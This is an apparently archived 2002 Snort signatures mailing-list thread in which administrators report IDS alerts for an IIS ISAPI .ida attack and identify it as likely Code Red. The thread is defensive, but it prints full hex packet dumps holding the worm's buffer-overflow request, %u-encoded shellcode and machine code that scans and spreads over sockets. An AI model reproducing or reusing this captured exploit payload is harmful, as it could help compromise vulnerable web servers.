[Snort-sigs] RE: ISAPI WORM

Robert Wagner rwagner at ...447...
Mon Apr 8 07:54:26 EDT 2002


This sounds like the original Code Red - based on the "Hacked By Chinese!"
I am thinking we need a better ISAPI definition.

-----Original Message-----
From: PM Systems - Rick Woehler [mailto:RWoehler at ...493...]
Sent: Monday, April 08, 2002 9:51 AM
To: Robert Wagner; snort-sigs at lists.sourceforge.net
Subject: RE: ISAPI WORM


I'm seeing this too and had just posted it to another list.  It has been
building over the last two weeks or so but I've had over 600+ alerts just
this morning.

 
Rick 



-----Original Message-----
From: Robert Wagner [mailto:rwagner at ...447...]
Sent: Monday, April 08, 2002 10:45 AM
To: snort-sigs at lists.sourceforge.net
Subject: ISAPI WORM


I noticed this worm coming through.  The is being picked up with:  
Apr  8 05:05:05 xserver02 snort: [1:1243:2] WEB-IIS ISAPI .ida attempt
[Classification: Web Application Attack] [Priority: 1]: {TCP}
61.142.131.43:1616 -> 208.44.159.30:80

Does anyone have a name for this worm?


[**] WEB-IIS ISAPI .ida attempt [**]
04/08-04:05:05.333278 61.142.131.43:1616 -> ME:80
TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:1504
***AP*** Seq: 0x72BB3CCB  Ack: 0xD9983EDF  Win: 0x4470  TcpLen: 20
0x0000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0170: 06 50 00 50 72 BB 3C CB D9 98 3E DF 50 18 44 70  .P.Pr.<...>.P.Dp
0x0180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0300: 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
0x0310: 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  ?NNNNNNNNNNNNNNN
0x0320: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0330: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0340: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0350: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0360: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0370: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0380: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0390: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03A0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03B0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03C0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03D0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03E0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03F0: 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  N...............
0x0400: C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25  .....x.. %u9090%
0x0410: 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
0x0420: 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
0x0430: 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
0x0440: 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
0x0450: 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
0x0460: 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
0x0470: 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
0x0480: 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
0x0490: 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F  ype: text/xml.HO
0x04A0: 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A  ST:www.worm.com.
0x04B0: 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E   Accept: */*.Con
0x04C0: 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36  tent-length: 356
0x04D0: 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53  9 ....U........S
0x04E0: 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC  VW..............
0x04F0: CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A  ......p.........
0x0500: 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64  .....h.........d
0x0510: A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9  ......G.d.=.....
0x0520: 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF  o.....`.........
0x0530: FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4  ......h.........
0x0540: FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A  .....X......w...
0x0550: 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B  ....p...........
0x0560: 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF  .X...........X..
0x0570: FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58  ...X......xu...X
0x0580: FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66  .........X...3.f
0x0590: 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58  ..=MZ..........X
0x05A0: FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B  ....Q<..X...3.f.
0x05B0: 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95  ....PE....y.....
0x05C0: 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01  X....B<..X....T.
0x05D0: 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54  x..X.....T.....T
0x05E0: FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D        ....H...X.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] WEB-MISC 403 Forbidden [**]
04/08-04:05:05.333278 ME:80 -> 61.142.131.43:1616
TCP TTL:125 TOS:0x0 ID:13941 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x72BB3CCB  Ack: 0xD9983EDF  Win: 0x4470  TcpLen: 20
0x0000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x00F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0170: 06 50 00 50 72 BB 3C CB D9 98 3E DF 50 18 44 70  .P.Pr.<...>.P.Dp
0x0180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x01F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x02F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
0x0300: 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
0x0310: 3F 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  ?NNNNNNNNNNNNNNN
0x0320: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0330: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0340: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0350: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0360: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0370: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0380: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x0390: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03A0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03B0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03C0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03D0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03E0: 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  NNNNNNNNNNNNNNNN
0x03F0: 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  N...............
0x0400: C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25  .....x.. %u9090%
0x0410: 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
0x0420: 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
0x0430: 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
0x0440: 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
0x0450: 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
0x0460: 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
0x0470: 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
0x0480: 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
0x0490: 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 48 4F  ype: text/xml.HO
0x04A0: 53 54 3A 77 77 77 2E 77 6F 72 6D 2E 63 6F 6D 0A  ST:www.worm.com.
0x04B0: 20 41 63 63 65 70 74 3A 20 2A 2F 2A 0A 43 6F 6E   Accept: */*.Con
0x04C0: 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 35 36  tent-length: 356
0x04D0: 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18 02 00 00 53  9 ....U........S
0x04E0: 56 57 8D BD E8 FD FF FF B9 86 00 00 00 B8 CC CC  VW..............
0x04F0: CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00 E9 0A  ......p.........
0x0500: 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF 64  .....h.........d
0x0510: A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9  ......G.d.=.....
0x0520: 6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF  o.....`.........
0x0530: FF FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4  ......h.........
0x0540: FE FF FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A  .....X......w...
0x0550: 00 00 83 BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B  ....p...........
0x0560: 8D 58 FE FF FF 81 C1 00 00 01 00 89 8D 58 FE FF  .X...........X..
0x0570: FF 81 BD 58 FE FF FF 00 00 00 78 75 0A C7 85 58  ...X......xu...X
0x0580: FE FF FF 00 00 F0 BF 8B 95 58 FE FF FF 33 C0 66  .........X...3.f
0x0590: 8B 02 3D 4D 5A 00 00 0F 85 9A 01 00 00 8B 8D 58  ..=MZ..........X
0x05A0: FE FF FF 8B 51 3C 8B 85 58 FE FF FF 33 C9 66 8B  ....Q<..X...3.f.
0x05B0: 0C 10 81 F9 50 45 00 00 0F 85 79 01 00 00 8B 95  ....PE....y.....
0x05C0: 58 FE FF FF 8B 42 3C 8B 8D 58 FE FF FF 8B 54 01  X....B<..X....T.
0x05D0: 78 03 95 58 FE FF FF 89 95 54 FE FF FF 8B 85 54  x..X.....T.....T
0x05E0: FE FF FF 8B 48 0C 03 8D 58 FE FF FF 89 8D        ....H...X.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/08-04:05:05.693278 61.142.131.43:1616 -> ME:80
TCP TTL:114 TOS:0x0 ID:50929 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0xD9983EDF  Ack: 0x72BB3CCB  Win: 0x4470  TcpLen: 20
0x0000: ..............................................................00 45
00  ....:1..c.....E.
0x0010: 05 DC C6 F1 40 00 72 06 0C 26 3D 8E 83 2B xx xx  .... at ...491...&=..+.,
0x0020: xx x 06 50 00 50 D9 98 3E DF 72 BB 3C CB 50 10  ...P.P..>.r.<.P.
0x0030: 44 70 C0 F3 00 00 D2 8D 66 F0 50 89 95 74 FE FF  Dp......f.P..t..
0x0040: FF 8B 45 08 8B 8D 50 FE FF FF 89 48 10 8B F4 8D  ..E...P....H....
0x0050: 95 2C FE FF FF 52 6A 00 8D 85 4C FE FF FF 50 8D  .,...Rj...L...P.
0x0060: 8D D0 FE FF FF 51 6A 00 6A 00 FF 95 98 FE FF FF  .....Qj.j.......
0x0070: 3B F4 90 43 4B 43 4B E9 9F 01 00 00 8B F4 FF 95  ;..CKCK.........
0x0080: A4 FE FF FF 3B F4 90 43 4B 43 4B 89 85 4C FE FF  ....;..CKCK..L..
0x0090: FF 8B 95 4C FE FF FF 81 E2 FF FF 00 00 89 95 4C  ...L...........L
0x00A0: FE FF FF 81 BD 4C FE FF FF 09 04 00 00 74 05 E9  .....L.......t..
0x00B0: 67 01 00 00 8B F4 68 00 DD 6D 00 FF 95 A0 FE FF  g.....h..m......
0x00C0: FF 3B F4 90 43 4B 43 4B E9 80 06 00 00 8F 85 4C  .;..CKCK.......L
0x00D0: FE FF FF 8B 85 34 FE FF FF 89 85 CC FE FF FF 8B  .....4..........
0x00E0: 8D 4C FE FF FF 8B 95 B0 FE FF FF 89 11 8B 85 4C  .L.............L
0x00F0: FE FF FF 8B 8D C8 FE FF FF 89 48 04 8B 95 68 FE  ..........H...h.
0x0100: FF FF 89 95 50 FE FF FF EB 0F 8B 85 50 FE FF FF  ....P.......P...
0x0110: 83 C0 01 89 85 50 FE FF FF 8B 8D 68 FE FF FF 81  .....P.....h....
0x0120: C1 00 01 00 00 39 8D 50 FE FF FF 73 12 8B 95 50  .....9.P...s...P
0x0130: FE FF FF 81 3A 4C 4D 54 48 75 02 EB 02 EB CB 8B  ....:LMTHu......
0x0140: 85 50 FE FF FF 83 C0 04 8B 8D 4C FE FF FF 89 41  .P........L....A
0x0150: 08 8B F4 8D 95 48 FE FF FF 52 6A 04 68 00 40 00  .....H...Rj.h. at ...180...
0x0160: 00 8B 85 CC FE FF FF 50 FF 95 A8 FE FF FF 3B F4  .......P......;.
0x0170: 90 43 4B 43 4B C7 85 4C FE FF FF 00 00 00 00 EB  .CKCK..L........
0x0180: 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D 4C FE FF FF  ...L........L...
0x0190: 81 BD 4C FE FF FF 00 30 00 00 7D 56 8B 95 CC FE  ..L....0..}V....
0x01A0: FF FF 03 95 4C FE FF FF 8B 02 3B 85 B0 FE FF FF  ....L.....;.....
0x01B0: 75 3E 8B 8D CC FE FF FF 03 8D 4C FE FF FF 8B 95  u>........L.....
0x01C0: 60 FE FF FF 89 11 8B F4 68 00 51 25 02 FF 95 A0  `.......h.Q%....
0x01D0: FE FF FF 3B F4 90 43 4B 43 4B 8B 85 CC FE FF FF  ...;..CKCK......
0x01E0: 03 85 4C FE FF FF 8B 8D B0 FE FF FF 89 08 EB 02  ..L.............
0x01F0: EB 8F 8B F4 8D 95 4C FE FF FF 52 8B 85 48 FE FF  ......L...R..H..
0x0200: FF 50 68 00 40 00 00 8B 8D CC FE FF FF 51 FF 95  .Ph. at ...492...
0x0210: A8 FE FF FF 3B F4 90 43 4B 43 4B BA 01 00 00 00  ....;..CKCK.....
0x0220: 85 D2 0F 84 E7 04 00 00 8B F4 6A 00 68 80 00 00  ..........j.h...
0x0230: 00 6A 03 6A 00 6A 01 68 00 00 00 80 8B 85 68 FE  .j.j.j.h......h.
0x0240: FF FF 83 C0 63 50 FF 95 9C FE FF FF 3B F4 90 43  ....cP......;..C
0x0250: 4B 43 4B 89 85 30 FE FF FF 83 BD 30 FE FF FF FF  KCK..0.....0....
0x0260: 74 1F B9 01 00 00 00 85 C9 74 16 8B F4 68 FF FF  t........t...h..
0x0270: FF 7F FF 95 A0 FE FF FF 3B F4 90 43 4B 43 4B EB  ........;..CKCK.
0x0280: E1 8B F4 8D 95 38 FE FF FF 52 FF 95 94 FE FF FF  .....8...R......
0x0290: 3B F4 90 43 4B 43 4B 8B 85 3E FE FF FF 89 85 4C  ;..CKCK..>.....L
0x02A0: FE FF FF 8B 8D 4C FE FF FF 81 E1 FF FF 00 00 89  .....L..........
0x02B0: 8D 4C FE FF FF 83 BD 4C FE FF FF 14 0F 8C 47 01  .L.....L......G.
0x02C0: 00 00 BA 01 00 00 00 85 D2 0F 84 3A 01 00 00 8B  ...........:....
0x02D0: F4 8D 85 38 FE FF FF 50 FF 95 94 FE FF FF 3B F4  ...8...P......;.
0x02E0: 90 43 4B 43 4B 8B 8D 3E FE FF FF 89 8D 4C FE FF  .CKCK..>.....L..
0x02F0: FF 8B 95 4C FE FF FF 81 E2 FF FF 00 00 89 95 4C  ...L...........L
0x0300: FE FF FF 83 BD 4C FE FF FF 1C 7C 1F B8 01 00 00  .....L....|.....
0x0310: 00 85 C0 74 16 8B F4 68 FF FF FF 7F FF 95 A0 FE  ...t...h........
0x0320: FF FF 3B F4 90 43 4B 43 4B EB E1 8B F4 6A 64 FF  ..;..CKCK....jd.
0x0330: 95 A0 FE FF FF 3B F4 90 43 4B 43 4B 8B F4 6A 00  .....;..CKCK..j.
0x0340: 6A 01 6A 02 FF 95 B8 FE FF FF 3B F4 90 43 4B 43  j.j.......;..CKC
0x0350: 4B 89 85 78 FE FF FF 66 C7 85 7C FE FF FF 02 00  K..x...f..|.....
0x0360: 66 C7 85 7E FE FF FF 00 50 C7 85 80 FE FF FF C6  f..~....P.......
0x0370: 89 F0 5B 8B F4 6A 10 8D 8D 7C FE FF FF 51 8B 95  ..[..j...|...Q..
0x0380: 78 FE FF FF 52 FF 95 BC FE FF FF 3B F4 90 43 4B  x...R......;..CK
0x0390: 43 4B C7 85 4C FE FF FF 00 00 00 00 EB 0F 8B 85  CK..L...........
0x03A0: 4C FE FF FF 83 C0 01 89 85 4C FE FF FF 81 BD 4C  L........L.....L
0x03B0: FE FF FF 00 80 01 00 7D 37 8B F4 68 E8 03 00 00  .......}7..h....
0x03C0: FF 95 A0 FE FF FF 3B F4 90 43 4B 43 4B 8B F4 6A  ......;..CKCK..j
0x03D0: 00 6A 01 8D 8D FC FE FF FF 51 8B 95 78 FE FF FF  .j.......Q..x...
0x03E0: 52 FF 95 C0 FE FF FF 3B F4 90 43 4B 43 4B EB AE  R......;..CKCK..
0x03F0: 8B F4 68 00 00 00 01 FF 95 A0 FE FF FF 3B F4 90  ..h..........;..
0x0400: 43 4B 43 4B E9 B9 FE FF FF 8B 85 44 FE FF FF 89  CKCK.......D....
0x0410: 85 50 FE FF FF 8B 8D 50 FE FF FF 0F AF 8D 50 FE  .P.....P......P.
0x0420: FF FF 69 C9 E3 59 CD 00 8B 95 50 FE FF FF 69 D2  ..i..Y....P...i.
0x0430: B9 E1 01 00 8B 85 74 FE FF FF 03 C1 03 D0 89 95  ......t.........
0x0440: 74 FE FF FF 8B 8D 74 FE FF FF 69 C9 83 33 CF 00  t.....t...i..3..
0x0450: 81 C1 53 FE 6B 07 89 8D 74 FE FF FF 8B 95 74 FE  ..S.k...t.....t.
0x0460: FF FF 81 E2 FF 00 00 00 89 95 50 FE FF FF 83 BD  ..........P.....
0x0470: 50 FE FF FF 7F 74 0C 81 BD 50 FE FF FF E0 00 00  P....t...P......
0x0480: 00 75 11 8B 85 74 FE FF FF 05 A9 0D 02 00 89 85  .u...t..........
0x0490: 74 FE FF FF 8B F4 6A 64 FF 95 A0 FE FF FF 3B F4  t.....jd......;.
0x04A0: 90 43 4B 43 4B 8B F4 6A 00 6A 01 6A 02 FF 95 B8  .CKCK..j.j.j....
0x04B0: FE FF FF 3B F4 90 43 4B 43 4B 89 85 78 FE FF FF  ...;..CKCK..x...
0x04C0: 66 C7 85 7C FE FF FF 02 00 66 C7 85 7E FE FF FF  f..|.....f..~...
0x04D0: 00 50 8B 8D 74 FE FF FF 89 8D 80 FE FF FF 8B F4  .P..t...........
0x04E0: 6A 10 8D 95 7C FE FF FF 52 8B 85 78 FE FF FF 50  j...|...R..x...P
0x04F0: FF 95 BC FE FF FF 3B F4 90 43 4B 43 4B 85 C0 0F  ......;..CKCK...
0x0500: 85 EF 01 00 00 8B F4 6A 00 6A 04 8B 8D 68 FE FF  .......j.j...h..
0x0510: FF 51 8B 95 78 FE FF FF 52 FF 95 C0 FE FF FF 3B  .Q..x...R......;
0x0520: F4 90 43 4B 43 4B C7 85 4C FE FF FF 00 00 00 00  ..CKCK..L.......
0x0530: 8B 45 08 8B 48 68 89 8D 64 FE FF FF EB 1E 8B 95  .E..Hh..d.......
0x0540: 64 FE FF FF 83 C2 01 89 95 64 FE FF FF 8B 85 4C  d........d.....L
